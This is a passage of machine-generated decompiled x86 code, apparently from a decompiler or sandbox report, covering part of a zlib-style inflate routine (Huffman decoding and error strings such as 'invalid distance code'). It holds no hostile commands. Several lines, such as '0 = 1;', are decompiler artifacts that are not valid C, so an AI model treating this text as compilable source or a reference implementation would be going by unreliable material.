                                                                                                                                                                                        										__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                                                        										if(__ecx <  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
                                                                                                                                                                                        											goto L208;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L208:
                                                                                                                                                                                        											__ecx =  *(__ebx + 0x54);
                                                                                                                                                                                        											__edx = 0;
                                                                                                                                                                                        											__eax =  *(__ebx + 0x4c);
                                                                                                                                                                                        											1 = 1 << __cl;
                                                                                                                                                                                        											__edx = (1 << __cl) - 1;
                                                                                                                                                                                        											__edx = (1 << __cl) - 0x00000001 & _v16;
                                                                                                                                                                                        											__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & _v16) * 4);
                                                                                                                                                                                        											__eax = __eax >> 8;
                                                                                                                                                                                        											__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        											_v56 = __eax;
                                                                                                                                                                                        											__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                                                        											if((__cl & 0x000000ff) <= __edi) {
                                                                                                                                                                                        												break;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__ecx = _v8;
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L332;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__edx = _v12;
                                                                                                                                                                                        											_v8 = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											 *__edx & 0x000000ff = ( *__edx & 0x000000ff) << __cl;
                                                                                                                                                                                        											_v16 = _v16 + (( *__edx & 0x000000ff) << __cl);
                                                                                                                                                                                        											_v12 = __edx;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__eflags = __edi;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__edx = __eax;
                                                                                                                                                                                        										_push(0x10);
                                                                                                                                                                                        										__edx = __eax >> 0x10;
                                                                                                                                                                                        										_pop(__ecx);
                                                                                                                                                                                        										__eflags = __dx - __cx;
                                                                                                                                                                                        										if(__eflags >= 0) {
                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                        												__edx = _v16;
                                                                                                                                                                                        												_push(0x11);
                                                                                                                                                                                        												_pop(__ecx);
                                                                                                                                                                                        												__eflags = _v54 - __cx;
                                                                                                                                                                                        												__ecx = __ah & 0x000000ff;
                                                                                                                                                                                        												if(_v54 != __cx) {
                                                                                                                                                                                        													_v20 = __ecx;
                                                                                                                                                                                        													while(1) {
                                                                                                                                                                                        														_t453 = __ecx + 7; // 0x18
                                                                                                                                                                                        														__eax = _t453;
                                                                                                                                                                                        														__eflags = __edi - _t453;
                                                                                                                                                                                        														if(__edi >= _t453) {
                                                                                                                                                                                        															break;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														__ecx = _v8;
                                                                                                                                                                                        														__eflags = __ecx;
                                                                                                                                                                                        														if(__ecx == 0) {
                                                                                                                                                                                        															goto L332;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														__eax = _v12;
                                                                                                                                                                                        														_v8 = __ecx;
                                                                                                                                                                                        														__ecx = __edi;
                                                                                                                                                                                        														 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
                                                                                                                                                                                        														__ecx = _v20;
                                                                                                                                                                                        														__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
                                                                                                                                                                                        														_v12 = _v12 + 1;
                                                                                                                                                                                        														__edi = __edi + 8;
                                                                                                                                                                                        														_v16 = __edx;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													__edx = __edx >> __cl;
                                                                                                                                                                                        													__ecx = __edx;
                                                                                                                                                                                        													__edx = __edx >> 7;
                                                                                                                                                                                        													__ecx = __ecx & 0x0000007f;
                                                                                                                                                                                        													_push(0xfffffff9);
                                                                                                                                                                                        													_pop(__eax);
                                                                                                                                                                                        													__ecx = __ecx + 0xb;
                                                                                                                                                                                        													__eax = __eax - _v20;
                                                                                                                                                                                        													__eflags = __eax;
                                                                                                                                                                                        													L228:
                                                                                                                                                                                        													_v56 = _v56 & 0x00000000;
                                                                                                                                                                                        													__edi = __edi + __eax;
                                                                                                                                                                                        													__eflags = __edi;
                                                                                                                                                                                        													L229:
                                                                                                                                                                                        													 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                                                        													_v52 = __ecx;
                                                                                                                                                                                        													__ecx = __ecx + _v48;
                                                                                                                                                                                        													_v16 = __edx;
                                                                                                                                                                                        													_v20 = __edi;
                                                                                                                                                                                        													__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                                                        													if(__ecx >  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
                                                                                                                                                                                        														 *(__esi + 0x18) = "invalid bit length repeat";
                                                                                                                                                                                        														 *__ebx = 0x1d;
                                                                                                                                                                                        														L237:
                                                                                                                                                                                        														__eflags =  *__ebx - 0x1d;
                                                                                                                                                                                        														if( *__ebx == 0x1d) {
                                                                                                                                                                                        															L141:
                                                                                                                                                                                        															__edx = _v16;
                                                                                                                                                                                        															goto L142;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														__eax = 0;
                                                                                                                                                                                        														__eflags =  *((intOrPtr*)(__ebx + 0x270)) - __ax;
                                                                                                                                                                                        														if( *((intOrPtr*)(__ebx + 0x270)) != __ax) {
                                                                                                                                                                                        															__eax = __ebx + 0x530;
                                                                                                                                                                                        															__ecx = __ebx + 0x6c;
                                                                                                                                                                                        															 *(__ebx + 0x4c) = __eax;
                                                                                                                                                                                        															 *(__ebx + 0x6c) = __eax;
                                                                                                                                                                                        															__edx = __ebx + 0x54;
                                                                                                                                                                                        															__eax = __ebx + 0x2f0;
                                                                                                                                                                                        															 *(__ebx + 0x54) = 9;
                                                                                                                                                                                        															__eax = __ebx + 0x70;
                                                                                                                                                                                        															__eax = E013233B4(1, __ebx + 0x70,  *(__ebx + 0x60), __ecx, __edx, __ebx + 0x2f0);
                                                                                                                                                                                        															_v36 = __eax;
                                                                                                                                                                                        															__eflags = __eax;
                                                                                                                                                                                        															if(__eax == 0) {
                                                                                                                                                                                        																__ecx = __ebx + 0x6c;
                                                                                                                                                                                        																__eax =  *__ecx;
                                                                                                                                                                                        																__edx = __ebx + 0x58;
                                                                                                                                                                                        																 *(__ebx + 0x50) =  *__ecx;
                                                                                                                                                                                        																__ebx + 0x2f0 =  *(__ebx + 0x60);
                                                                                                                                                                                        																__eax =  *(__ebx + 0x60) + 0x38;
                                                                                                                                                                                        																 *(__ebx + 0x58) = 6;
                                                                                                                                                                                        																__eax = __ebx + ( *(__ebx + 0x60) + 0x38) * 2;
                                                                                                                                                                                        																__eax = E013233B4(2, __ebx + ( *(__ebx + 0x60) + 0x38) * 2,  *(__ebx + 0x64), __ecx, __edx, __ebx + 0x2f0);
                                                                                                                                                                                        																_v36 = __eax;
                                                                                                                                                                                        																__eflags = __eax;
                                                                                                                                                                                        																if(__eax == 0) {
                                                                                                                                                                                        																	__eflags = _a8 - 6;
                                                                                                                                                                                        																	__ecx = _v8;
                                                                                                                                                                                        																	 *__ebx = 0x13;
                                                                                                                                                                                        																	if(_a8 == 6) {
                                                                                                                                                                                        																		goto L332;
                                                                                                                                                                                        																	}
                                                                                                                                                                                        																	__edx = _v16;
                                                                                                                                                                                        																	goto L246;
                                                                                                                                                                                        																}
                                                                                                                                                                                        																 *(__esi + 0x18) = "invalid distances set";
                                                                                                                                                                                        																L204:
                                                                                                                                                                                        																 *__ebx = 0x1d;
                                                                                                                                                                                        																goto L141;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															 *(__esi + 0x18) = "invalid literal/lengths set";
                                                                                                                                                                                        															goto L204;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														 *(__esi + 0x18) = "invalid code -- missing end-of-block";
                                                                                                                                                                                        														goto L204;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													__ecx = _v52;
                                                                                                                                                                                        													__eflags = __ecx;
                                                                                                                                                                                        													if(__ecx == 0) {
                                                                                                                                                                                        														continue;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													__edx = _v56;
                                                                                                                                                                                        													do {
                                                                                                                                                                                        														__eax =  *(__ebx + 0x68);
                                                                                                                                                                                        														 *((short*)(__ebx + 0x70 +  *(__ebx + 0x68) * 2)) = __dx;
                                                                                                                                                                                        														 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                                                                                                        														__ecx = __ecx - 1;
                                                                                                                                                                                        														__eflags = __ecx;
                                                                                                                                                                                        													} while (__ecx != 0);
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_v20 = __ecx;
                                                                                                                                                                                        												while(1) {
                                                                                                                                                                                        													_t443 = __ecx + 3; // 0x14
                                                                                                                                                                                        													__eax = _t443;
                                                                                                                                                                                        													__eflags = __edi - _t443;
                                                                                                                                                                                        													if(__edi >= _t443) {
                                                                                                                                                                                        														break;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													__ecx = _v8;
                                                                                                                                                                                        													__eflags = __ecx;
                                                                                                                                                                                        													if(__ecx == 0) {
                                                                                                                                                                                        														goto L332;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													__eax = _v12;
                                                                                                                                                                                        													_v8 = __ecx;
                                                                                                                                                                                        													__ecx = __edi;
                                                                                                                                                                                        													 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
                                                                                                                                                                                        													__ecx = _v20;
                                                                                                                                                                                        													__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
                                                                                                                                                                                        													_v12 = _v12 + 1;
                                                                                                                                                                                        													__edi = __edi + 8;
                                                                                                                                                                                        													_v16 = __edx;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												__edx = __edx >> __cl;
                                                                                                                                                                                        												__ecx = __edx;
                                                                                                                                                                                        												__edx = __edx >> 3;
                                                                                                                                                                                        												__ecx = __ecx & 0x00000007;
                                                                                                                                                                                        												_push(0xfffffffd);
                                                                                                                                                                                        												_pop(__eax);
                                                                                                                                                                                        												__ecx = __ecx + 3;
                                                                                                                                                                                        												__eax = __eax - _v20;
                                                                                                                                                                                        												goto L228;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eax = __eax >> 8;
                                                                                                                                                                                        											__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        											__ecx = (__cl & 0x000000ff) + 2;
                                                                                                                                                                                        											_v56 = __ecx;
                                                                                                                                                                                        											__eflags = __edi - __ecx;
                                                                                                                                                                                        											if(__edi >= __ecx) {
                                                                                                                                                                                        												L215:
                                                                                                                                                                                        												__edx = _v16;
                                                                                                                                                                                        												__ecx = __ah & 0x000000ff;
                                                                                                                                                                                        												__eax = _v48;
                                                                                                                                                                                        												__edi = __edi - __ecx;
                                                                                                                                                                                        												__edx = _v16 >> __cl;
                                                                                                                                                                                        												_v16 = __edx;
                                                                                                                                                                                        												_v20 = __edi;
                                                                                                                                                                                        												__eflags = __eax;
                                                                                                                                                                                        												if(__eax == 0) {
                                                                                                                                                                                        													 *(__esi + 0x18) = "invalid bit length repeat";
                                                                                                                                                                                        													goto L25;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												__eax =  *(__ebx + 0x6e + __eax * 2) & 0x0000ffff;
                                                                                                                                                                                        												__ecx = __edx;
                                                                                                                                                                                        												__ecx = __edx & 0x00000003;
                                                                                                                                                                                        												__edx = __edx >> 2;
                                                                                                                                                                                        												__ecx = __ecx + 3;
                                                                                                                                                                                        												_v56 = __eax;
                                                                                                                                                                                        												__edi = __edi - 2;
                                                                                                                                                                                        												goto L229;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												goto L213;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                        												L213:
                                                                                                                                                                                        												__ecx = _v8;
                                                                                                                                                                                        												__eflags = __ecx;
                                                                                                                                                                                        												if(__ecx == 0) {
                                                                                                                                                                                        													goto L332;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_v8 = __ecx;
                                                                                                                                                                                        												__ecx = _v12;
                                                                                                                                                                                        												__edx =  *_v12 & 0x000000ff;
                                                                                                                                                                                        												__ecx = __edi;
                                                                                                                                                                                        												__edx = ( *_v12 & 0x000000ff) << __cl;
                                                                                                                                                                                        												__edi = __edi + 8;
                                                                                                                                                                                        												_v16 = _v16 + (( *_v12 & 0x000000ff) << __cl);
                                                                                                                                                                                        												_v12 = _v12 + 1;
                                                                                                                                                                                        												__eflags = __edi - _v56;
                                                                                                                                                                                        												if(__edi < _v56) {
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L215;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L332;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax = __eax >> 8;
                                                                                                                                                                                        										__ecx = __al & 0x000000ff;
                                                                                                                                                                                        										__eax = _v48;
                                                                                                                                                                                        										__edi = __edi - (__al & 0x000000ff);
                                                                                                                                                                                        										_v16 = _v16 >> __cl;
                                                                                                                                                                                        										_v20 = __edi;
                                                                                                                                                                                        										 *((short*)(__ebx + 0x70 + _v48 * 2)) = __dx;
                                                                                                                                                                                        										 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L237;
                                                                                                                                                                                        								case 0x13:
                                                                                                                                                                                        									L246:
                                                                                                                                                                                        									 *__ebx = 0x14;
                                                                                                                                                                                        									goto L247;
                                                                                                                                                                                        								case 0x14:
                                                                                                                                                                                        									L247:
                                                                                                                                                                                        									__eflags = __ecx - 6;
                                                                                                                                                                                        									if(__ecx < 6) {
                                                                                                                                                                                        										L251:
                                                                                                                                                                                        										__eax =  *(__ebx + 0x4c);
                                                                                                                                                                                        										__ecx =  *(__ebx + 0x54);
                                                                                                                                                                                        										 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) & 0x00000000;
                                                                                                                                                                                        										_v52 =  *(__ebx + 0x4c);
                                                                                                                                                                                        										0 = 1;
                                                                                                                                                                                        										__eax = 1 << __cl;
                                                                                                                                                                                        										__ecx =  *(__ebx + 0x4c);
                                                                                                                                                                                        										__eax = (1 << __cl) - 1;
                                                                                                                                                                                        										__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                                                        										__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & __edx) * 4);
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											__eax = __eax >> 8;
                                                                                                                                                                                        											__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        											__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                                                        											if((__cl & 0x000000ff) <= __edi) {
                                                                                                                                                                                        												break;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__ecx = _v8;
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L332;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eax = _v12;
                                                                                                                                                                                        											_v8 = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											_v20 = __edi;
                                                                                                                                                                                        											 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
                                                                                                                                                                                        											__ecx =  *(__ebx + 0x54);
                                                                                                                                                                                        											__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
                                                                                                                                                                                        											_v12 = _v12 + 1;
                                                                                                                                                                                        											__eax =  *(__ebx + 0x4c);
                                                                                                                                                                                        											_v16 = __edx;
                                                                                                                                                                                        											0 = 1;
                                                                                                                                                                                        											1 << __cl = (1 << __cl) - 1;
                                                                                                                                                                                        											__edx = (1 << __cl) - 0x00000001 & _v16;
                                                                                                                                                                                        											__eflags = 1;
                                                                                                                                                                                        											__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & _v16) * 4);
                                                                                                                                                                                        											__edx = _v16;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags = __al;
                                                                                                                                                                                        										if(__al == 0) {
                                                                                                                                                                                        											L261:
                                                                                                                                                                                        											__eax = __eax >> 8;
                                                                                                                                                                                        											__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                                                                                                        											__edi = __edi - __ecx;
                                                                                                                                                                                        											__edx = __edx >> __cl;
                                                                                                                                                                                        											__ecx = __eax;
                                                                                                                                                                                        											__ecx = __eax >> 0x10;
                                                                                                                                                                                        											_v16 = __edx;
                                                                                                                                                                                        											_v20 = __edi;
                                                                                                                                                                                        											 *(__ebx + 0x40) = __ecx;
                                                                                                                                                                                        											__eflags = __al;
                                                                                                                                                                                        											if(__al != 0) {
                                                                                                                                                                                        												__eflags = __al & 0x00000020;
                                                                                                                                                                                        												if((__al & 0x00000020) == 0) {
                                                                                                                                                                                        													__ecx = _v8;
                                                                                                                                                                                        													__eflags = __al & 0x00000040;
                                                                                                                                                                                        													if((__al & 0x00000040) == 0) {
                                                                                                                                                                                        														__eax = __al & 0x000000ff;
                                                                                                                                                                                        														__eax = __al & 0xf;
                                                                                                                                                                                        														__eflags = __eax;
                                                                                                                                                                                        														 *__ebx = 0x15;
                                                                                                                                                                                        														 *(__ebx + 0x48) = __eax;
                                                                                                                                                                                        														goto L268;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													 *(__esi + 0x18) = "invalid literal/length code";
                                                                                                                                                                                        													L39:
                                                                                                                                                                                        													 *__ebx = 0x1d;
                                                                                                                                                                                        													goto L143;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
                                                                                                                                                                                        												 *__ebx = 0xb;
                                                                                                                                                                                        												goto L142;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											 *__ebx = 0x19;
                                                                                                                                                                                        											goto L142;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags = __al & 0x000000f0;
                                                                                                                                                                                        										if((__al & 0x000000f0) != 0) {
                                                                                                                                                                                        											goto L261;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__edi = 0;
                                                                                                                                                                                        										__ecx = __al & 0x000000ff;
                                                                                                                                                                                        										__ebx = __eax;
                                                                                                                                                                                        										__edi = 1;
                                                                                                                                                                                        										__ebx = __eax >> 8;
                                                                                                                                                                                        										__edx = __eax;
                                                                                                                                                                                        										__esi = __bl & 0x000000ff;
                                                                                                                                                                                        										__ecx = (__al & 0x000000ff) + __esi;
                                                                                                                                                                                        										__eax = __eax >> 0x10;
                                                                                                                                                                                        										__edi = 1 << __cl;
                                                                                                                                                                                        										__ecx = __esi;
                                                                                                                                                                                        										__edi = (1 << __cl) - 1;
                                                                                                                                                                                        										_v56 = __edx;
                                                                                                                                                                                        										(1 << __cl) - 0x00000001 & _v16 = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
                                                                                                                                                                                        										__ecx = _v52;
                                                                                                                                                                                        										__edi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax;
                                                                                                                                                                                        										__eax =  *((intOrPtr*)(_v52 + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax) * 4));
                                                                                                                                                                                        										__ecx = __eax;
                                                                                                                                                                                        										__edi = _v20;
                                                                                                                                                                                        										__ecx = __eax >> 8;
                                                                                                                                                                                        										__esi = __cl & 0x000000ff;
                                                                                                                                                                                        										__ecx = __bl & 0x000000ff;
                                                                                                                                                                                        										__ebx = _v40;
                                                                                                                                                                                        										__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
                                                                                                                                                                                        										__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
                                                                                                                                                                                        										if((__cl & 0x000000ff) + (__bl & 0x000000ff) <= __edi) {
                                                                                                                                                                                        											L260:
                                                                                                                                                                                        											__esi = _a4;
                                                                                                                                                                                        											__ecx = __dh & 0x000000ff;
                                                                                                                                                                                        											__edx = _v16;
                                                                                                                                                                                        											__edx = _v16 >> __cl;
                                                                                                                                                                                        											__edi = __edi - __ecx;
                                                                                                                                                                                        											__eflags = __edi;
                                                                                                                                                                                        											 *(__ebx + 0x1bc4) = __ecx;
                                                                                                                                                                                        											goto L261;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											goto L258;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L258:
                                                                                                                                                                                        											__esi = _v8;
                                                                                                                                                                                        											__eflags = __esi;
                                                                                                                                                                                        											if(__esi == 0) {
                                                                                                                                                                                        												goto L331;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__esi = __esi - 1;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											_v8 = __esi;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__esi = _v12;
                                                                                                                                                                                        											_v20 = __edi;
                                                                                                                                                                                        											__edi = __dh & 0x000000ff;
                                                                                                                                                                                        											 *__esi & 0x000000ff = ( *__esi & 0x000000ff) << __cl;
                                                                                                                                                                                        											_v16 = _v16 + (( *__esi & 0x000000ff) << __cl);
                                                                                                                                                                                        											__esi = __esi + 1;
                                                                                                                                                                                        											__eax = _v54 & 0x0000ffff;
                                                                                                                                                                                        											_v12 = __esi;
                                                                                                                                                                                        											0 = 1;
                                                                                                                                                                                        											__dl & 0x000000ff = (__dl & 0x000000ff) + __edi;
                                                                                                                                                                                        											__esi = 1 << __cl;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & _v16;
                                                                                                                                                                                        											__esi = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
                                                                                                                                                                                        											__esi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff);
                                                                                                                                                                                        											__eax =  *(__ebx + 0x4c);
                                                                                                                                                                                        											__eax =  *( *(__ebx + 0x4c) + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff)) * 4);
                                                                                                                                                                                        											__eax = __eax >> 8;
                                                                                                                                                                                        											__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        											__ecx = (__cl & 0x000000ff) + __edi;
                                                                                                                                                                                        											__edi = _v20;
                                                                                                                                                                                        											__eflags = __ecx - __edi;
                                                                                                                                                                                        											if(__ecx > __edi) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L260;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L331;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eax = _v28;
                                                                                                                                                                                        									__eflags = __eax - 0x102;
                                                                                                                                                                                        									if(__eax < 0x102) {
                                                                                                                                                                                        										goto L251;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__ebx = _v32;
                                                                                                                                                                                        									_push(_v44);
                                                                                                                                                                                        									 *(__esi + 0xc) = _v32;
                                                                                                                                                                                        									__ebx = _v40;
                                                                                                                                                                                        									 *(__esi + 0x10) = __eax;
                                                                                                                                                                                        									__eax = _v12;
                                                                                                                                                                                        									 *__esi = _v12;
                                                                                                                                                                                        									 *(__esi + 4) = __ecx;
                                                                                                                                                                                        									_push(__esi);
                                                                                                                                                                                        									 *(__ebx + 0x38) = __edx;
                                                                                                                                                                                        									 *(__ebx + 0x3c) = __edi;
                                                                                                                                                                                        									__eax = E01323840();
                                                                                                                                                                                        									__eflags =  *__ebx - 0xb;
                                                                                                                                                                                        									__eax =  *(__esi + 0xc);
                                                                                                                                                                                        									__edx =  *(__ebx + 0x38);
                                                                                                                                                                                        									__edi =  *(__ebx + 0x3c);
                                                                                                                                                                                        									_pop(__ecx);
                                                                                                                                                                                        									_v32 =  *(__esi + 0xc);
                                                                                                                                                                                        									__eax =  *(__esi + 0x10);
                                                                                                                                                                                        									_pop(__ecx);
                                                                                                                                                                                        									__ecx =  *(__esi + 4);
                                                                                                                                                                                        									_v28 =  *(__esi + 0x10);
                                                                                                                                                                                        									__eax =  *__esi;
                                                                                                                                                                                        									_v12 =  *__esi;
                                                                                                                                                                                        									_v8 = __ecx;
                                                                                                                                                                                        									_v16 = __edx;
                                                                                                                                                                                        									_v20 = __edi;
                                                                                                                                                                                        									if( *__ebx == 0xb) {
                                                                                                                                                                                        										 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L143;
                                                                                                                                                                                        								case 0x15:
                                                                                                                                                                                        									L268:
                                                                                                                                                                                        									__esi =  *(__ebx + 0x48);
                                                                                                                                                                                        									__eflags = __esi;
                                                                                                                                                                                        									if(__esi == 0) {
                                                                                                                                                                                        										L274:
                                                                                                                                                                                        										__eax =  *(__ebx + 0x40);
                                                                                                                                                                                        										 *(__ebx + 0x1bc8) =  *(__ebx + 0x40);
                                                                                                                                                                                        										 *__ebx = 0x16;
                                                                                                                                                                                        										goto L275;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eflags = __edi - __esi;
                                                                                                                                                                                        									if(__edi >= __esi) {
                                                                                                                                                                                        										L273:
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__ecx = __esi;
                                                                                                                                                                                        										__eax = 1;
                                                                                                                                                                                        										__edi = __edi - __esi;
                                                                                                                                                                                        										1 << __cl = (1 << __cl) - 1;
                                                                                                                                                                                        										_v20 = __edi;
                                                                                                                                                                                        										__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                                                        										__edx = __edx >> __cl;
                                                                                                                                                                                        										 *(__ebx + 0x40) =  *(__ebx + 0x40) + __eax;
                                                                                                                                                                                        										_t601 = __ebx + 0x1bc4;
                                                                                                                                                                                        										 *_t601 =  *(__ebx + 0x1bc4) + __esi;
                                                                                                                                                                                        										__eflags =  *_t601;
                                                                                                                                                                                        										_v16 = __edx;
                                                                                                                                                                                        										goto L274;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eax = _v12;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L331;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										_v8 = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx = _v8;
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										__eax = _v12;
                                                                                                                                                                                        										__eax = _v12 + 1;
                                                                                                                                                                                        										_v16 = __edx;
                                                                                                                                                                                        										_v12 = __eax;
                                                                                                                                                                                        										__eflags = __edi - __esi;
                                                                                                                                                                                        										if(__edi < __esi) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L273;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L331;
                                                                                                                                                                                        								case 0x16:
                                                                                                                                                                                        									L275:
                                                                                                                                                                                        									__ecx =  *(__ebx + 0x58);
                                                                                                                                                                                        									__eax = 0;
                                                                                                                                                                                        									__esi =  *(__ebx + 0x50);
                                                                                                                                                                                        									1 = 1 << __cl;
                                                                                                                                                                                        									__eax = (1 << __cl) - 1;
                                                                                                                                                                                        									_v52 = __esi;
                                                                                                                                                                                        									__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                                                        									__eax =  *(__esi + ((1 << __cl) - 0x00000001 & __edx) * 4);
                                                                                                                                                                                        									1 = 1 >> 8;
                                                                                                                                                                                        									__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        									__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                                                        									if((__cl & 0x000000ff) <= __edi) {
                                                                                                                                                                                        										L279:
                                                                                                                                                                                        										__eflags = __al & 0x000000f0;
                                                                                                                                                                                        										if((__al & 0x000000f0) != 0) {
                                                                                                                                                                                        											L284:
                                                                                                                                                                                        											__esi = _a4;
                                                                                                                                                                                        											__eax = __eax >> 8;
                                                                                                                                                                                        											__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                                                                                                        											__edi = __edi - __ecx;
                                                                                                                                                                                        											__edx = __edx >> __cl;
                                                                                                                                                                                        											_v16 = __edx;
                                                                                                                                                                                        											_v20 = __edi;
                                                                                                                                                                                        											__eflags = __al & 0x00000040;
                                                                                                                                                                                        											if((__al & 0x00000040) == 0) {
                                                                                                                                                                                        												__ecx = __eax;
                                                                                                                                                                                        												 *__ebx = 0x17;
                                                                                                                                                                                        												__ecx = __eax >> 0x10;
                                                                                                                                                                                        												__eax = __al & 0x000000ff;
                                                                                                                                                                                        												__eax = __al & 0xf;
												__eflags = __eax;
												 *(__ebx + 0x44) = __ecx;
												 *(__ebx + 0x48) = __eax;
												goto L287;
											}
											 *(__esi + 0x18) = "invalid distance code";
											goto L25;
										}
										__edi = 0;
										__ecx = __al & 0x000000ff;
										__ebx = __eax;
										__edi = 1;
										__ebx = __eax >> 8;
										__edx = __eax;
										__esi = __bl & 0x000000ff;
										__ecx = (__al & 0x000000ff) + __esi;
										__eax = __eax >> 0x10;
										__edi = 1 << __cl;
										__ecx = __esi;
